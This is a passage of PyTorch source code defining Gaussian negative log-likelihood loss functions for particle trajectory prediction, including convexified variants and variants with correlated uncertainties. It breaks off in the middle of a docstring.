indices_vperp = torch.LongTensor([1])
indices_apar = torch.LongTensor([2])
indices_aperp = torch.LongTensor([3])
if preds.is_cuda:
indices_vpar, indices_vperp, indices_apar, indices_aperp = indices_vpar.cuda(), indices_vperp.cuda(), indices_apar.cuda(), indices_aperp.cuda()
losscomponentparalleltov = (errorvectorparalleltov ** 2) * torch.index_select(inversevariance, 3,
indices_vpar).squeeze()
losscomponentperptov = (errorvectorperptov ** 2) * torch.index_select(inversevariance, 3, indices_vperp).squeeze()
losscomponentparalleltoa = (errorvectorparalleltoa ** 2) * torch.index_select(inversevariance, 3,
indices_apar).squeeze()
losscomponentperptoa = (errorvectorperptoa ** 2) * torch.index_select(inversevariance, 3, indices_aperp).squeeze()
neg_log_loss = losscomponentparalleltov + losscomponentperptov + losscomponentparalleltoa + losscomponentperptoa
loss_1 = neg_log_loss
loss_2 = 0.0
if add_const:
const = (0.5 * torch.log(2 * np.pi * determinant))
neg_log_loss += const.squeeze()
loss_2 += const.squeeze()
return ((neg_log_loss).sum(dim=1)/target.size(1)).var()
def nll_gaussian_multivariatesigma_convexified(preds, target, sigma, accel, vel, sigma_prev, preds_prev, vvec, sigmavec, alpha, add_const=True):
"""
Loss function for the case of variable sigma multivariate normal case with added convexification. The Algorithm
follows that suggested by Edoardo Calvello
:param preds: prediction values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param target: target data of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param sigma: tensor of sigma values size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param accel: gives direction of acceleration of each prediction data point. Size [batch, particles, timesteps, 2]
:param sigma_prev: previous prediction of sigma
:param preds_prev: previous prediction of the position and velocity space
:param vel: gives direction of velocity of each prediction data point. Size [batch, particles, timesteps, 2]
:param vvec: vector that is used to provide the point of convexification from previous iteration. Size [batch, particles, timesteps, 4]
:param sigmavec: same as vvec but for sigma parameters. Size [batch, particles, timesteps, 4]
:param alpha: scale of the convexification. Float.
:param add_const: True- adds the 1/2 ln(2*pi*variance) term
:return: value of the loss function normalised by (batch * number of atoms), value for loss of each term
"""
    # according to the algorithm, we convexify about y_k = alpha_k * v_{k-1} + (1 - alpha_k) * x_{k-1}
yphasespace = alpha * vvec + (1-alpha) * preds_prev
ysigmaterm = alpha * sigmavec + (1-alpha) * sigma_prev
# get normalised vectors for acceleration and velocities v|| and a||
# t = time.time()
velnorm = vel.norm(p=2, dim = 3, keepdim = True)
normalisedvel = vel.div(velnorm.expand_as(vel))
# 1/sqrt(2) - isotropic => direction unimportant. chosen here to improve efficiency
normalisedvel[torch.isnan(normalisedvel)] = np.power(1/2, 1/2)
accelnorm = accel.norm(p=2, dim = 3, keepdim = True)
normalisedaccel = accel.div(accelnorm.expand_as(accel))
normalisedaccel[torch.isnan(normalisedaccel)] = np.power(1 / 2, 1 / 2)
# print('extractdata: {:.1f}s'.format(time.time() - t))
# get perpendicular components to the accelerations and velocities accelperp, velperp
# # note in 2D perpendicular vector is just rotation by pi/2 about origin (x,y) -> (-y,x)
# need Sigma=Sigma^2, Sigma^-2 and det(Sigma)
# ti = time.time()
variance = sigma ** 2
# ensures variance does not go to 0
if (torch.min(variance) < pow(10, -10)):
accuracy = np.full((variance.size(0), variance.size(1), variance.size(2), variance.size(3)),
pow(10, -10), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
variance = torch.max(variance, accuracy)
determinant = torch.prod(variance, 3).unsqueeze(3)
inversevariance = variance ** -1
# need position and velocity differences in (x,y) coordinates
differences = preds-target
indices_pos = torch.LongTensor([0,1])
indices_vel = torch.LongTensor([2,3])
if preds.is_cuda:
indices_pos, indices_vel = indices_pos.cuda(), indices_vel.cuda()
position_differences = torch.index_select(differences, 3, indices_pos)
velocity_differences = torch.index_select(differences, 3, indices_vel)
position_differences = position_differences.unsqueeze(4)
    velocity_differences = velocity_differences.unsqueeze(4)  # (x-mu)
# print('getdifferences: {:.1f}s'.format(time.time() - ti))
    # the matrix multiplication for the multivariate case can be thought of as taking a projection of the error
    # vector along the parallel and perpendicular velocity/acceleration directions and multiplying by 1/sigma^2
    # along that direction. This follows directly from the fact that the rotation matrix is orthogonal.
# multime = time.time()
    # surprisingly it is more efficient to calculate the perpendicular term by considering
    # (position_differences - (position_differences.v||)v||).vperp to get the position differences in the
    # perpendicular direction than by using the rotation (x,y) -> (-y,x), as the triple for loop is inefficient;
    # about 100x faster this way and almost as fast as the isotropic case
errorvectorparalleltov = torch.matmul(normalisedvel.unsqueeze(3), position_differences)
parallelterm = torch.matmul(normalisedvel.unsqueeze(4), errorvectorparalleltov)
perpterm = (position_differences - parallelterm).squeeze()
perpnorm = perpterm.norm(p=2, dim = 3, keepdim = True)
    # NaN can occur when dividing by 0 (see comment below). The problem with replacing NaN after the division is
    # that the NaN carries through anyway - the function being backpropagated through keeps the NaN and therefore
    # leads to NaN errors on the second pass of the function - replacing the 0's before the division solves this
    # issue.
if (torch.min(perpnorm) < pow(10, -7)):
accuracy = np.full((perpnorm.size(0), perpnorm.size(1), perpnorm.size(2), perpnorm.size(3)),
pow(10, -7), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
perpnorm = torch.max(perpnorm, accuracy)
normalisedperp = perpterm.div(perpnorm.expand_as(perpterm))
    # NaN can occur when perpterm is 0; this means that preds-true = ((preds-true).v||) v||,
    # i.e. the error is entirely in the parallel direction and none is perpendicular: so we set these terms to 0
# normalisedperp[torch.isnan(normalisedperp)] = 0
# gets the error vectors
errorvectorperptov = torch.matmul(perpterm.unsqueeze(3), normalisedperp.unsqueeze(4)).squeeze()
errorvectorparalleltov = errorvectorparalleltov.squeeze()
# errorvectorperptov = torch.matmul(velperp.unsqueeze(3), position_differences).squeeze()
errorvectorparalleltoa = torch.matmul(normalisedaccel.unsqueeze(3), velocity_differences)
parallelterm = torch.matmul(normalisedaccel.unsqueeze(4), errorvectorparalleltoa)
perpterm = (velocity_differences - parallelterm).squeeze()
perpnorm = perpterm.norm(p=2, dim=3, keepdim=True)
if (torch.min(perpnorm) < pow(10, -7)):
accuracy = np.full((perpnorm.size(0), perpnorm.size(1), perpnorm.size(2), perpnorm.size(3)),
pow(10, -7), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
perpnorm = torch.max(perpnorm, accuracy)
normalisedperp = perpterm.div(perpnorm.expand_as(perpterm))
    # NaN when preds-target is entirely in the v parallel direction. This means the error in the perpendicular
    # direction is 0
# normalisedperp[torch.isnan(normalisedperp)] = 0
errorvectorperptoa = torch.matmul(perpterm.unsqueeze(3), normalisedperp.unsqueeze(4)).squeeze()
errorvectorparalleltoa = errorvectorparalleltoa.squeeze()
# errorvectorperptoa = torch.matmul(accelperp.unsqueeze(3), velocity_differences).squeeze()
indices_vpar = torch.LongTensor([0])
indices_vperp = torch.LongTensor([1])
indices_apar = torch.LongTensor([2])
indices_aperp = torch.LongTensor([3])
#print('matrixmult: {:.1f}s'.format(time.time() - multime))
if preds.is_cuda:
indices_vpar, indices_vperp, indices_apar, indices_aperp = indices_vpar.cuda(), indices_vperp.cuda(), indices_apar.cuda(), indices_aperp.cuda()
# t = time.time()
# gets the loss components
losscomponentparalleltov = (errorvectorparalleltov ** 2) * torch.index_select(inversevariance, 3, indices_vpar).squeeze()
losscomponentperptov = (errorvectorperptov ** 2) * torch.index_select(inversevariance, 3, indices_vperp).squeeze()
losscomponentparalleltoa = (errorvectorparalleltoa ** 2) * torch.index_select(inversevariance, 3, indices_apar).squeeze()
losscomponentperptoa = (errorvectorperptoa ** 2) * torch.index_select(inversevariance, 3, indices_aperp).squeeze()
neg_log_loss = losscomponentparalleltov + losscomponentperptov + losscomponentparalleltoa + losscomponentperptoa
loss_1 = neg_log_loss
loss_2 = 0.0
# print('getlosscomponents: {:.1f}s'.format(time.time() - t))
    # convexifying term is lambda * ||x - y||^2 following the algorithm suggested by Edoardo Calvello;
    # lambda is chosen as 0.1 here
    convterm = 0.1 * ((preds - target) - yphasespace) ** 2 + 0.1 * (sigma - ysigmaterm) ** 2
    neg_log_loss += convterm.sum(dim=3)
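    # i.e. the objective minimised becomes f + 0.1 * (||(preds - target) - yphasespace||^2 + ||sigma - ysigmaterm||^2),
    # a quadratic penalty centred on the convexification point from the previous iterate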
if add_const:
        const = 0.5 * torch.log(2 * np.pi * determinant)
neg_log_loss += const.squeeze()
loss_2 += const.squeeze()
    return (neg_log_loss).sum() / (target.size(0) * target.size(1)), loss_1.sum() / (target.size(0) * target.size(1)), loss_2 / (target.size(0) * target.size(1))  # normalisation here is (batch * num atoms)
def nll_gaussian_multivariatesigma_var_convexified(preds, target, sigma, accel, vel, sigma_prev, preds_prev, vvec, sigmavec, alpha, add_const=True):
"""
Loss function for the case of variable sigma multivariate normal case with added convexification. The Algorithm
follows that suggested by Edoardo Calvello
:param preds: prediction values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param target: target data of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param sigma: tensor of sigma values size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param accel: gives direction of acceleration of each prediction data point. Size [batch, particles, timesteps, 2]
:param sigma_prev: previous prediction of sigma
:param preds_prev: previous prediction of the position and velocity space
:param vel: gives direction of velocity of each prediction data point. Size [batch, particles, timesteps, 2]
:param vvec: vector that is used to provide the point of convexification from previous iteration. Size [batch, particles, timesteps, 4]
:param sigmavec: same as vvec but for sigma parameters. Size [batch, particles, timesteps, 4]
:param alpha: scale of the convexification. Float.
:param add_const: True- adds the 1/2 ln(2*pi*variance) term
:return: value of the loss function normalised by (batch * number of atoms), value for loss of each term
"""
    # according to the algorithm, we convexify about y_k = alpha_k * v_{k-1} + (1 - alpha_k) * x_{k-1}
yphasespace = alpha * vvec + (1-alpha) * preds_prev
ysigmaterm = alpha * sigmavec + (1-alpha) * sigma_prev
# get normalised vectors for acceleration and velocities v|| and a||
# t = time.time()
velnorm = vel.norm(p=2, dim = 3, keepdim = True)
normalisedvel = vel.div(velnorm.expand_as(vel))
# 1/sqrt(2) - isotropic => direction unimportant. chosen here to improve efficiency
normalisedvel[torch.isnan(normalisedvel)] = np.power(1/2, 1/2)
accelnorm = accel.norm(p=2, dim = 3, keepdim = True)
normalisedaccel = accel.div(accelnorm.expand_as(accel))
normalisedaccel[torch.isnan(normalisedaccel)] = np.power(1 / 2, 1 / 2)
# print('extractdata: {:.1f}s'.format(time.time() - t))
# get perpendicular components to the accelerations and velocities accelperp, velperp
# # note in 2D perpendicular vector is just rotation by pi/2 about origin (x,y) -> (-y,x)
# need Sigma=Sigma^2, Sigma^-2 and det(Sigma)
# ti = time.time()
variance = sigma ** 2
# ensures variance does not go to 0
if (torch.min(variance) < pow(10, -10)):
accuracy = np.full((variance.size(0), variance.size(1), variance.size(2), variance.size(3)),
pow(10, -10), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
variance = torch.max(variance, accuracy)
determinant = torch.prod(variance, 3).unsqueeze(3)
inversevariance = variance ** -1
# need position and velocity differences in (x,y) coordinates
differences = preds-target
indices_pos = torch.LongTensor([0,1])
indices_vel = torch.LongTensor([2,3])
if preds.is_cuda:
indices_pos, indices_vel = indices_pos.cuda(), indices_vel.cuda()
position_differences = torch.index_select(differences, 3, indices_pos)
velocity_differences = torch.index_select(differences, 3, indices_vel)
position_differences = position_differences.unsqueeze(4)
    velocity_differences = velocity_differences.unsqueeze(4)  # (x-mu)
# print('getdifferences: {:.1f}s'.format(time.time() - ti))
    # the matrix multiplication for the multivariate case can be thought of as taking a projection of the error
    # vector along the parallel and perpendicular velocity/acceleration directions and multiplying by 1/sigma^2
    # along that direction. This follows directly from the fact that the rotation matrix is orthogonal.
# multime = time.time()
    # surprisingly it is more efficient to calculate the perpendicular term by considering
    # (position_differences - (position_differences.v||)v||).vperp to get the position differences in the
    # perpendicular direction than by using the rotation (x,y) -> (-y,x), as the triple for loop is inefficient;
    # about 100x faster this way and almost as fast as the isotropic case
errorvectorparalleltov = torch.matmul(normalisedvel.unsqueeze(3), position_differences)
parallelterm = torch.matmul(normalisedvel.unsqueeze(4), errorvectorparalleltov)
perpterm = (position_differences - parallelterm).squeeze()
perpnorm = perpterm.norm(p=2, dim = 3, keepdim = True)
    # NaN can occur when dividing by 0 (see comment below). The problem with replacing NaN after the division is
    # that the NaN carries through anyway - the function being backpropagated through keeps the NaN and therefore
    # leads to NaN errors on the second pass of the function - replacing the 0's before the division solves this
    # issue.
if (torch.min(perpnorm) < pow(10, -7)):
accuracy = np.full((perpnorm.size(0), perpnorm.size(1), perpnorm.size(2), perpnorm.size(3)),
pow(10, -7), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
perpnorm = torch.max(perpnorm, accuracy)
normalisedperp = perpterm.div(perpnorm.expand_as(perpterm))
    # NaN can occur when perpterm is 0; this means that preds-true = ((preds-true).v||) v||,
    # i.e. the error is entirely in the parallel direction and none is perpendicular: so we set these terms to 0
# normalisedperp[torch.isnan(normalisedperp)] = 0
# gets the error vectors
errorvectorperptov = torch.matmul(perpterm.unsqueeze(3), normalisedperp.unsqueeze(4)).squeeze()
errorvectorparalleltov = errorvectorparalleltov.squeeze()
# errorvectorperptov = torch.matmul(velperp.unsqueeze(3), position_differences).squeeze()
errorvectorparalleltoa = torch.matmul(normalisedaccel.unsqueeze(3), velocity_differences)
parallelterm = torch.matmul(normalisedaccel.unsqueeze(4), errorvectorparalleltoa)
perpterm = (velocity_differences - parallelterm).squeeze()
perpnorm = perpterm.norm(p=2, dim=3, keepdim=True)
if (torch.min(perpnorm) < pow(10, -7)):
accuracy = np.full((perpnorm.size(0), perpnorm.size(1), perpnorm.size(2), perpnorm.size(3)),
pow(10, -7), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
perpnorm = torch.max(perpnorm, accuracy)
normalisedperp = perpterm.div(perpnorm.expand_as(perpterm))
    # NaN when preds-target is entirely in the v parallel direction. This means the error in the perpendicular
    # direction is 0
# normalisedperp[torch.isnan(normalisedperp)] = 0
errorvectorperptoa = torch.matmul(perpterm.unsqueeze(3), normalisedperp.unsqueeze(4)).squeeze()
errorvectorparalleltoa = errorvectorparalleltoa.squeeze()
# errorvectorperptoa = torch.matmul(accelperp.unsqueeze(3), velocity_differences).squeeze()
indices_vpar = torch.LongTensor([0])
indices_vperp = torch.LongTensor([1])
indices_apar = torch.LongTensor([2])
indices_aperp = torch.LongTensor([3])
#print('matrixmult: {:.1f}s'.format(time.time() - multime))
if preds.is_cuda:
indices_vpar, indices_vperp, indices_apar, indices_aperp = indices_vpar.cuda(), indices_vperp.cuda(), indices_apar.cuda(), indices_aperp.cuda()
# t = time.time()
# gets the loss components
losscomponentparalleltov = (errorvectorparalleltov ** 2) * torch.index_select(inversevariance, 3, indices_vpar).squeeze()
losscomponentperptov = (errorvectorperptov ** 2) * torch.index_select(inversevariance, 3, indices_vperp).squeeze()
losscomponentparalleltoa = (errorvectorparalleltoa ** 2) * torch.index_select(inversevariance, 3, indices_apar).squeeze()
losscomponentperptoa = (errorvectorperptoa ** 2) * torch.index_select(inversevariance, 3, indices_aperp).squeeze()
neg_log_loss = losscomponentparalleltov + losscomponentperptov + losscomponentparalleltoa + losscomponentperptoa
loss_1 = neg_log_loss
loss_2 = 0.0
# print('getlosscomponents: {:.1f}s'.format(time.time() - t))
    # convexifying term is lambda * ||x - y||^2 following the algorithm suggested by Edoardo Calvello;
    # lambda is chosen as 0.1 here
    convterm = 0.1 * ((preds - target) - yphasespace) ** 2 + 0.1 * (sigma - ysigmaterm) ** 2
    neg_log_loss += convterm.sum(dim=3)
if add_const:
        const = 0.5 * torch.log(2 * np.pi * determinant)
neg_log_loss += const.squeeze()
loss_2 += const.squeeze()
return ((neg_log_loss).sum(dim=1)/target.size(1)).var()
def nll_gaussian_var_multivariatesigma_withcorrelations(preds, target, sigma, accel, vel, eps= 1e-3, alpha = 0.05, add_const=True):
"""
Loss function for the case of variable sigma multivariate normal case with correlations between coordinates.
Implemented based on arXiv:1910.14215 [cs.LG] R.L. Russell et al findings
sigma has shape [batchsize, no.ofparticles, times, (s11,rho12,rho21,s22,s33,rho34,rho43,s44)]
:param preds: prediction values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param target: target data of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param sigma: tensor of sigma values size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param accel: gives direction of acceleration of each prediction data point. Size [batch, particles, timesteps, 2]
:param vel: gives direction of velocity of each prediction data point. Size [batch, particles, timesteps, 2]
:param eps: small term to ensure Pearson correlation coefficients are not close to 1: see arXiv:1910.14215 [cs.LG] R.L. Russell et al
:param alpha: term that ensures Pearson correlation coefficients do not saturate quickly: see arXiv:1910.14215 [cs.LG] R.L. Russell et al
:param add_const: True- adds the 1/2 ln(2*pi*variance) term
:return: variance of the loss function
"""
# get normalised vectors for acceleration and velocities v|| and a||
# t = time.time()
velnorm = vel.norm(p=2, dim=3, keepdim=True)
normalisedvel = vel.div(velnorm.expand_as(vel))
# 1/sqrt(2) - isotropic when NaN => direction unimportant. chosen here to improve efficiency
normalisedvel[torch.isnan(normalisedvel)] = np.power(1 / 2, 1 / 2)
accelnorm = accel.norm(p=2, dim=3, keepdim=True)
normalisedaccel = accel.div(accelnorm.expand_as(accel))
normalisedaccel[torch.isnan(normalisedaccel)] = np.power(1 / 2, 1 / 2)
    # tanh activation keeps the Pearson correlation coefficients within (-1,1); the (1 - eps) factor keeps them
    # away from +/-1 and alpha stops them saturating too quickly: see arXiv:1910.14215 [cs.LG] R.L. Russell et al
indices_pos = torch.LongTensor([1, 2])
indices_vel = torch.LongTensor([5, 6])
if preds.is_cuda:
indices_pos, indices_vel = indices_pos.cuda(), indices_vel.cuda()
    # extract the Pearson coefficients output by the NN
rho_pos = torch.index_select(sigma, 3, indices_pos)
rho_vel = torch.index_select(sigma, 3, indices_vel)
    # rescale the Pearson coefficients
rho_pos = (1 - eps) * torch.tanh(alpha * rho_pos)
rho_vel = (1 - eps) * torch.tanh(alpha * rho_vel)
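    # e.g. with alpha = 0.05 and eps = 1e-3, a raw NN output of 1.0 maps to (1 - 1e-3) * tanh(0.05) ~= 0.0499,
    # so the coefficients grow slowly and can never reach +/-1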
# extract each of the sigma terms for position and velocity
indices_pos_1 = torch.LongTensor([0])
indices_pos_2 = torch.LongTensor([3])
indices_vel_1 = torch.LongTensor([4])
indices_vel_2 = torch.LongTensor([7])
if preds.is_cuda:
indices_pos_1, indices_pos_2, indices_vel_1, indices_vel_2 = indices_pos_1.cuda(), indices_pos_2.cuda(), indices_vel_1.cuda(), indices_vel_2.cuda()
sigma_pos_1 = torch.index_select(sigma, 3, indices_pos_1)
sigma_pos_2 = torch.index_select(sigma, 3, indices_pos_2)
sigma_vel_1 = torch.index_select(sigma, 3, indices_vel_1)
sigma_vel_2 = torch.index_select(sigma, 3, indices_vel_2)
    # off-diagonal terms of the sigma matrix are given by rho * sqrt(sigma1 * sigma2)
sigma_term_pos = torch.sqrt((sigma_pos_1 * sigma_pos_2))
sigma_term_vel = torch.sqrt((sigma_vel_1 * sigma_vel_2))
offdiagsigma_pos = tile(sigma_term_pos, 3, rho_pos.size(3))
offdiagsigma_vel = tile(sigma_term_vel, 3, rho_vel.size(3))
sigmaoffdiag_pos = rho_pos * offdiagsigma_pos
sigmaoffdiag_vel = rho_vel * offdiagsigma_vel
# need Sigma=Sigma^2, Sigma^-2 and det(Sigma)
# ti = time.time()
# reconstruct sigma from position and velocity
indices_pos_1 = torch.LongTensor([0])
indices_pos_2 = torch.LongTensor([3])
indices_vel_1 = torch.LongTensor([4])
indices_vel_2 = torch.LongTensor([7])
if preds.is_cuda:
indices_pos_1, indices_pos_2, indices_vel_1, indices_vel_2 = indices_pos_1.cuda(), indices_pos_2.cuda(), indices_vel_1.cuda(), indices_vel_2.cuda()
sigma_pos = torch.cat((torch.cat((torch.index_select(sigma, 3, indices_pos_1), sigmaoffdiag_pos), 3),
torch.index_select(sigma, 3, indices_pos_2)), 3)
sigma_vel = torch.cat((torch.cat((torch.index_select(sigma, 3, indices_vel_1), sigmaoffdiag_vel), 3),
torch.index_select(sigma, 3, indices_vel_2)), 3)
sigma_pos = sigma_pos.reshape(sigma.size(0), sigma.size(1), sigma.size(2), 2, 2)
sigma_vel = sigma_vel.reshape(sigma.size(0), sigma.size(1), sigma.size(2), 2, 2)
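    # each reconstructed 2x2 sigma block therefore has the layout
    #   [ s11                      rho12 * sqrt(s11 * s22) ]
    #   [ rho21 * sqrt(s11 * s22)  s22                     ]
    # (and similarly for the velocity block with s33, s44, rho34, rho43)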
# get sigma^2 for pos and vel
variance_pos = torch.matmul(sigma_pos, sigma_pos)
variance_vel = torch.matmul(sigma_vel, sigma_vel)
# reshape to desired shape for use
variance_pos = variance_pos.reshape(variance_pos.size(0), variance_pos.size(1), variance_pos.size(2), 4)
variance_vel = variance_vel.reshape(variance_vel.size(0), variance_vel.size(1), variance_vel.size(2), 4)
indices_sigma = torch.LongTensor([0, 3])
indices_diag_1 = torch.LongTensor([1, 2])
if preds.is_cuda:
indices_sigma, indices_diag_1 = indices_sigma.cuda(), indices_diag_1.cuda()
# extract variance
var_pos = torch.index_select(variance_pos, 3, indices_sigma)
var_vel = torch.index_select(variance_vel, 3, indices_sigma)
offdiag_pos = torch.index_select(variance_pos, 3, indices_diag_1)
offdiag_vel = torch.index_select(variance_vel, 3, indices_diag_1)
# ensures variance does not go to 0
if (torch.min(var_pos) < pow(10, -14)) or (torch.min(var_vel) < pow(10, -14)):
accuracy = np.full((var_pos.size(0), var_pos.size(1), var_pos.size(2), var_pos.size(3)),
pow(10, -14), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
var_pos = torch.max(var_pos, accuracy)
var_vel = torch.max(var_vel, accuracy)
indices_1 = torch.LongTensor([0])
indices_2 = torch.LongTensor([1])
if preds.is_cuda:
indices_1, indices_2 = indices_1.cuda(), indices_2.cuda()
# recasts the variance into desired form
variance_pos = torch.cat((torch.cat((torch.index_select(var_pos, 3, indices_1), offdiag_pos), 3),
torch.index_select(var_pos, 3, indices_2)), 3)
variance_vel = torch.cat((torch.cat((torch.index_select(var_vel, 3, indices_1), offdiag_vel), 3),
torch.index_select(var_vel, 3, indices_2)), 3)
variance_pos = variance_pos.reshape(variance_pos.size(0), variance_pos.size(1), variance_pos.size(2), 2, 2)
variance_vel = variance_vel.reshape(variance_vel.size(0), variance_vel.size(1), variance_vel.size(2), 2, 2)
    # determinant of a block diagonal matrix = product of the determinants of the sub-matrices
determinant_pos = variance_pos.det()
determinant_vel = variance_vel.det()
determinant = determinant_vel * determinant_pos
    # Matrix is not invertible iff sigma1 or sigma2 == 0 or the Pearson correlation coefficients are +/-1
    # (we ensure this is not the case above). The inverse is of the form
    #   1/(1-rho^2) * [  1/sigma1^2            -rho/(sigma1*sigma2) ]
    #                 [ -rho/(sigma1*sigma2)    1/sigma2^2          ]
inversevariance_pos = torch.inverse(variance_pos)
inversevariance_vel = torch.inverse(variance_vel)
# recasts inverse variance into desired shape
inversevariance_pos = inversevariance_pos.reshape(inversevariance_pos.size(0), inversevariance_pos.size(1),
inversevariance_pos.size(2), 4)
inversevariance_vel = inversevariance_vel.reshape(inversevariance_vel.size(0), inversevariance_vel.size(1),
inversevariance_vel.size(2), 4)
# if np.isnan(np.sum(inversevariance.cpu().detach().numpy())):
# print("Some values from variance are nan")
# need position and velocity differences in (x,y) coordinates
differences = preds - target
indices_pos = torch.LongTensor([0, 1])
indices_vel = torch.LongTensor([2, 3])
if preds.is_cuda:
indices_pos, indices_vel = indices_pos.cuda(), indices_vel.cuda()
position_differences = torch.index_select(differences, 3, indices_pos)
velocity_differences = torch.index_select(differences, 3, indices_vel)
position_differences = position_differences.unsqueeze(4)
velocity_differences = velocity_differences.unsqueeze(4) # (x-mu)
# print('getdifferences: {:.1f}s'.format(time.time() - ti))
    # the matrix multiplication for the multivariate case can be thought of as taking a projection of the error
    # vector along the parallel and perpendicular velocity/acceleration directions and multiplying by 1/sigma^2
    # along that direction. This follows directly from the fact that the rotation matrix is orthogonal.
# multime = time.time()
    # surprisingly it is more efficient to calculate the perpendicular term by considering
    # (position_differences - (position_differences.v||)v||).vperp to get the position differences in the
    # perpendicular direction than by using the rotation (x,y) -> (-y,x), as the triple for loop is inefficient;
    # about 100x faster this way and almost as fast as the isotropic case
errorvectorparalleltov = torch.matmul(normalisedvel.unsqueeze(3), position_differences)
parallelterm = torch.matmul(normalisedvel.unsqueeze(4), errorvectorparalleltov)
perpterm = (position_differences - parallelterm).squeeze()
perpnorm = perpterm.norm(p=2, dim=3, keepdim=True)
    # NaN can occur when dividing by 0 (see comment below). The problem with replacing NaN after the division is
    # that the NaN carries through anyway - the function being backpropagated through keeps the NaN and therefore
    # leads to NaN errors on the second pass of the function - replacing the 0's before the division solves this
    # issue.
if (torch.min(perpnorm) < pow(10, -7)):
accuracy = np.full((perpnorm.size(0), perpnorm.size(1), perpnorm.size(2), perpnorm.size(3)),
pow(10, -7), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
perpnorm = torch.max(perpnorm, accuracy)
normalisedperp = perpterm.div(perpnorm.expand_as(perpterm))
    # NaN can occur when perpterm is 0; this means that preds-true = ((preds-true).v||) v||,
    # i.e. the error is entirely in the parallel direction and none is perpendicular: so we set these terms to 0
# normalisedperp[torch.isnan(normalisedperp)] = 0
errorvectorperptov = torch.matmul(perpterm.unsqueeze(3), normalisedperp.unsqueeze(4)).squeeze()
errorvectorparalleltov = errorvectorparalleltov.squeeze()
# errorvectorperptov = torch.matmul(velperp.unsqueeze(3), position_differences).squeeze()
errorvectorparalleltoa = torch.matmul(normalisedaccel.unsqueeze(3), velocity_differences)
parallelterm = torch.matmul(normalisedaccel.unsqueeze(4), errorvectorparalleltoa)
perpterm = (velocity_differences - parallelterm).squeeze()
perpnorm = perpterm.norm(p=2, dim=3, keepdim=True)
if (torch.min(perpnorm) < pow(10, -7)):
accuracy = np.full((perpnorm.size(0), perpnorm.size(1), perpnorm.size(2), perpnorm.size(3)),
pow(10, -7), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
perpnorm = torch.max(perpnorm, accuracy)
normalisedperp = perpterm.div(perpnorm.expand_as(perpterm))
    # NaN when preds-target is entirely in the v parallel direction. This means the error in the perpendicular
    # direction is 0
# normalisedperp[torch.isnan(normalisedperp)] = 0
errorvectorperptoa = torch.matmul(perpterm.unsqueeze(3), normalisedperp.unsqueeze(4)).squeeze()
errorvectorparalleltoa = errorvectorparalleltoa.squeeze()
# errorvectorperptoa = torch.matmul(accelperp.unsqueeze(3), velocity_differences).squeeze()
indices_par = torch.LongTensor([0])
indices_perp = torch.LongTensor([3])
indices_rho12 = torch.LongTensor([1])
indices_rho21 = torch.LongTensor([2])
# print('matrixmult: {:.1f}s'.format(time.time() - multime))
if preds.is_cuda:
indices_par, indices_perp, indices_rho12, indices_rho21 = indices_par.cuda(), indices_perp.cuda(), indices_rho12.cuda(), indices_rho21.cuda()
# t = time.time()
losscomponentparalleltov = (errorvectorparalleltov ** 2) * torch.index_select(inversevariance_pos, 3,
indices_par).squeeze()
losscomponentperptov = (errorvectorperptov ** 2) * torch.index_select(inversevariance_pos, 3,
indices_perp).squeeze()
losscomponentparalleltoa = (errorvectorparalleltoa ** 2) * torch.index_select(inversevariance_vel, 3,
indices_par).squeeze()
losscomponentperptoa = (errorvectorperptoa ** 2) * torch.index_select(inversevariance_vel, 3,
indices_perp).squeeze()
losscomponentoffdiagv = (errorvectorperptov * errorvectorparalleltov) * (
torch.index_select(inversevariance_pos, 3, indices_rho12) + torch.index_select(inversevariance_pos, 3,
indices_rho21)).squeeze()
losscomponentoffdiaga = (errorvectorperptoa * errorvectorparalleltoa) * (
torch.index_select(inversevariance_vel, 3, indices_rho12) + torch.index_select(inversevariance_vel, 3,
indices_rho21)).squeeze()
neg_log_loss = losscomponentparalleltov + losscomponentperptov + losscomponentparalleltoa + losscomponentperptoa + losscomponentoffdiagv + losscomponentoffdiaga
loss_1 = neg_log_loss
loss_2 = 0.0
# print('getlosscomponents: {:.1f}s'.format(time.time() - t))
if add_const:
const = (0.5 * torch.log(2 * np.pi * determinant))
neg_log_loss += const.squeeze()
loss_2 += const.squeeze()
return ((neg_log_loss).sum(dim=1)/target.size(1)).var()
def nll_gaussian_multivariatesigma_withcorrelations(preds, target, sigma, accel, vel, eps= 1e-3, alpha = 0.2, add_const=True):
"""
Loss function for the case of variable sigma multivariate normal case with correlations between coordinates.
Implemented based on arXiv:1910.14215 [cs.LG] R.L. Russell et al findings
sigma has shape [batchsize, no.ofparticles, times, (s11,rho12,rho21,s22,s33,rho34,rho43,s44)]
:param preds: prediction values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param target: target data of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param sigma: tensor of sigma values size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param accel: gives direction of acceleration of each prediction data point. Size [batch, particles, timesteps, 2]
:param vel: gives direction of velocity of each prediction data point. Size [batch, particles, timesteps, 2]
:param eps: small term to ensure Pearson correlation coefficients are not close to 1: see arXiv:1910.14215 [cs.LG] R.L. Russell et al
:param alpha: term that ensures Pearson correlation coefficients do not saturate quickly: see arXiv:1910.14215 [cs.LG] R.L. Russell et al
